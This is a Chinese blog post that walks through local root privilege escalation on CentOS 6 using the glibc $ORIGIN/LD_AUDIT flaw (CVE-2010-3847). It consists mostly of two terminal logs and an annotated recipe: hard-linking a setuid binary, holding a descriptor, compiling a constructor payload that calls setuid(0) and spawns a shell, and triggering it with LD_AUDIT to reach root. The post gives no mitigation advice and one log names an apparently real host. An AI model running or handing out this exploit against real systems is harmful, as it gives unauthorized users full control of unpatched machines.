linux(CVE-2010-3847)漏洞和利用方法

15274

 

【linux提权记录】

存在危险的linux系统:

[root@dbserver a]# cat /etc/redhat-release
CentOS release 6.3 (Final)
[root@dbserver a]# uname -a
Linux dbserver 2.6.32-279.5.2.el6.i686 #1 SMP Thu Aug 23 22:16:48 UTC 2012 i686 i686 i386 GNU/Linux

【提权过程记录】

[root@dbserver a]# useradd test
[root@dbserver a]# passwd test
Changing password for user test.
New password:
BAD PASSWORD: it is based on a dictionary word
BAD PASSWORD: is too simple
Retype new password:
passwd: all authentication tokens updated successfully.
[root@dbserver a]# su  - test
[test@dbserver ~]$ ls
[test@dbserver ~]$ cd /tmp/
[test@dbserver tmp]$ mkdir exploit
[test@dbserver tmp]$ cd exploit/
[test@dbserver exploit]$ ln /bin/ping /tmp/exploit/target
[test@dbserver exploit]$ exec 3< /tmp/exploit/target
[test@dbserver exploit]$ ls -al
total 48
drwxrwxr-x   2 test test  4096 Jan  4 19:49 .
drwxrwxrwt. 37 root root  4096 Jan  4 19:49 ..
-rwsr-xr-x.  2 root root 36892 Jul 18  2011 target
[test@dbserver exploit]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 Jan  4 19:50 /proc/16369/fd/3 -> /tmp/exploit/target
[test@dbserver exploit]$ cd ..
[test@dbserver tmp]$ rm -rf /tmp/exploit/
[test@dbserver tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 Jan  4 19:50 /proc/16369/fd/3 -> /tmp/exploit/target (deleted)
[test@dbserver tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 Jan  4 19:50 /proc/16369/fd/3 -> /tmp/exploit/target (deleted)
[test@dbserver tmp]$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
^D#按ctrl+D键
 
[test@dbserver tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[test@dbserver tmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1 test test 4163 Jan  4 19:53 /tmp/exploit
[test@dbserver tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[root@dbserver a]# whoami
root
[root@dbserver a]# id
uid=0(root) gid=0(root) groups=0(root)

【第二次测试过程记录】

[root@91hpay ~]# useradd test
[root@91hpay ~]# passwd test
Changing password for user test.
New password:
BAD PASSWORD: it is based on a dictionary word
BAD PASSWORD: is too simple
Retype new password:
passwd: all authentication tokens updated successfully.
[root@91hpay ~]# su - test
[test@91hpay ~]$ cd /tmp/
[test@91hpay tmp]$ mkdir test
[test@91hpay tmp]$ cd test/
[test@91hpay test]$ ln /bin/ping /tmp/test/test
[test@91hpay test]$ cd ..
[test@91hpay tmp]$ exec 3< /tmp/test/test
[test@91hpay tmp]$ ls -al /tmp/test/test
-rwsr-xr-x. 2 root root 41432 Nov 12  2010 /tmp/test/test
[test@91hpay tmp]$ ls -l /proc/$$/fd/3
lr-x------. 1 test test 64 Jan  5 12:05 /proc/19378/fd/3 -> /tmp/test/test
[test@91hpay tmp]$ rm -rf /tmp/test
[test@91hpay tmp]$ ls -l /proc/$$/fd/3
lr-x------. 1 test test 64 Jan  5 12:05 /proc/19378/fd/3 -> /tmp/test/test (deleted)
[test@91hpay tmp]$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
[test@91hpay tmp]$ gcc -w -fPIC -shared -o /tmp/test payload.c
payload.c:5: error: redefinition of ‘init’
payload.c:1: note: previous definition of ‘init’ was here
[test@91hpay tmp]$ ls -l /tmp/test
ls: cannot access /tmp/test: No such file or directory
[test@91hpay tmp]$ vi payload.c
[test@91hpay tmp]$ ls -al payload.c
-rw-rw-r--. 1 test test 77 Jan  5 12:09 payload.c
[test@91hpay tmp]$ gcc -w -fPIC -shared -o /tmp/test payload.c
[test@91hpay tmp]$ ls -al /tmp/test
-rwxrwxr-x. 1 test test 6020 Jan  5 12:09 /tmp/test
[test@91hpay tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
 
[root@91hpay ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
 
 
[root@91hpay ~]# cat /etc/redhat-release
CentOS Linux release 6.0 (Final)
[root@91hpay ~]# uname -a
Linux 91hpay.com 2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux

 

 

【过程介召】
这个漏洞主要针对Linux操作系统,已经出来了一段时间了,只需寻找一下是否带有用户s权限的文件,若包含基本可以提权成功,

下面是具体方法:

$ORIGIN是代表在文件系统多级结构中所加载的可执行程序的位置的ELF替换序列。glibc的动态链接器展开特权应用的$ORIGIN替换的方式存在漏洞,本地用户可以通过创建到setuid应用的硬链接并通过LD_AUDIT强制展开$ORIGIN来获得权限提升,

具体过程如下:

#
在/tmp下创建可控制的目录
$ mkdir /tmp/exploit

# 链接到suid二进制程序以更改$ORIGIN的定义
$
ln /bin/ping /tmp/exploit/target

# 打开到目标二进制程序的文件描述符
$ exec 3<
/tmp/exploit/target

# 现在可通过/proc访问描述符
$ ls -l /proc/$$/fd/3

lr-x—— 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 ->
/tmp/exploit/target*

# 删除之前所创建的目录
$ rm -rf /tmp/exploit/

#
/proc链接仍存在,但已标记为已被删除
$ ls -l /proc/$$/fd/3
lr-x—— 1 taviso taviso 64
Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)

#
使用负载DSO替换目录,使$ORIGIN成为到dlopen()的有效目标
$ cat > payload.c
void
__attribute__((constructor)) init()
{
setuid(0);

system(“/bin/bash”);
}
^D
$ gcc -w -fPIC -shared -o /tmp/exploit
payload.c
$ ls -l /tmp/exploit
-rwxrwx— 1 taviso taviso 4.2K Oct 15
09:22 /tmp/exploit*

# 通过LD_AUDIT强制/proc中的链接加载$ORIGIN
$
LD_AUDIT=”\$ORIGIN” exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1#
id
uid=0(root) gid=500(taviso)

http://www.exploit-db.com/exploits/15274/

 

文 / admin
LEAVE A REPLY

loading